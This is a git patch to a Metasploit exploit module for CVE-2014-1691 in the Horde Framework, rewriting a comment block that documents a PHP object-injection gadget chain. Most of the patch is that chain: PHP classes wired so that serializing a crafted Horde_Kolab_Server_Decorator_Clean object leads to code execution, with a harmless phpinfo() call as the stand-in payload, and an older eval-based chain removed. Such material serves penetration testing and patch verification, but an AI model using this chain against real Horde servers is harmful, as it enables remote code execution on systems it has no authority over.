From 379c0efd5af2b104cbbc6ff52dec37a802497224 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 18 Mar 2014 16:29:30 -0500
Subject: [PATCH] Update POP chain documentation

---
 .../unix/webapp/horde_unserialize_exec.rb     | 65 +++++++++----------
 1 file changed, 30 insertions(+), 35 deletions(-)

diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
index 775d40b529..17457ca2c7 100644
--- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
@@ -94,56 +94,51 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 
 =begin
+
 PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
 
-$phpcode = '"&&eval("phpinfo();die;")=="';
- 
-class Horde_Date_Parser_Token
+class Horde_Config
 {
-   public $tags = array('A');
+   protected $_oldConfig = "phpinfo();die;";
 }
- 
+
 class Horde_Prefs_Scope
 {
-   protected $_prefs;
- 
-   function __construct()
-   {
-      $this->_prefs = array($GLOBALS['phpcode'] => 1);
-   }
+   protected $_prefs = array(1);
 }
- 
+
 class Horde_Prefs
 {
-   protected $_opts, $_scopes;
- 
-   function __construct()
-   {
-      $this->_opts['sizecallback'] = array(new Horde_Date_Parser_Token, 'untag');
-      $this->_scopes['horde'] = new Horde_Prefs_Scope;
-   }
+   protected $_opts, $_scopes;
+
+   function __construct()
+   {
+      $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
+      $this->_scopes['horde'] = new Horde_Prefs_Scope;
+   }
 }
- 
+
 class Horde_Prefs_Identity
 {
-   protected $_prefs, $_prefnames;
- 
-   function __construct()
-   {
-      $this->_prefs = new Horde_Prefs;
-      $this->_prefnames['identities'] = $GLOBALS['phpcode'];
-   }
+   protected $_prefs, $_prefnames;
+
+   function __construct()
+   {
+      $this->_prefs = new Horde_Prefs;
+      $this->_prefnames['identities'] = 0;
+   }
 }
- 
+
 class Horde_Kolab_Server_Decorator_Clean
 {
-   private $_server, $_added = array(1);
- 
-   function __construct()
-   {
-      $this->_server = new Horde_Prefs_Identity;
-   }
+   private $_server, $_added = array(1);
+
+   function __construct()
+   {
+      $this->_server = new Horde_Prefs_Identity;
+   }
 }
-  
+
 $popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
+
 =end
\ No newline at end of file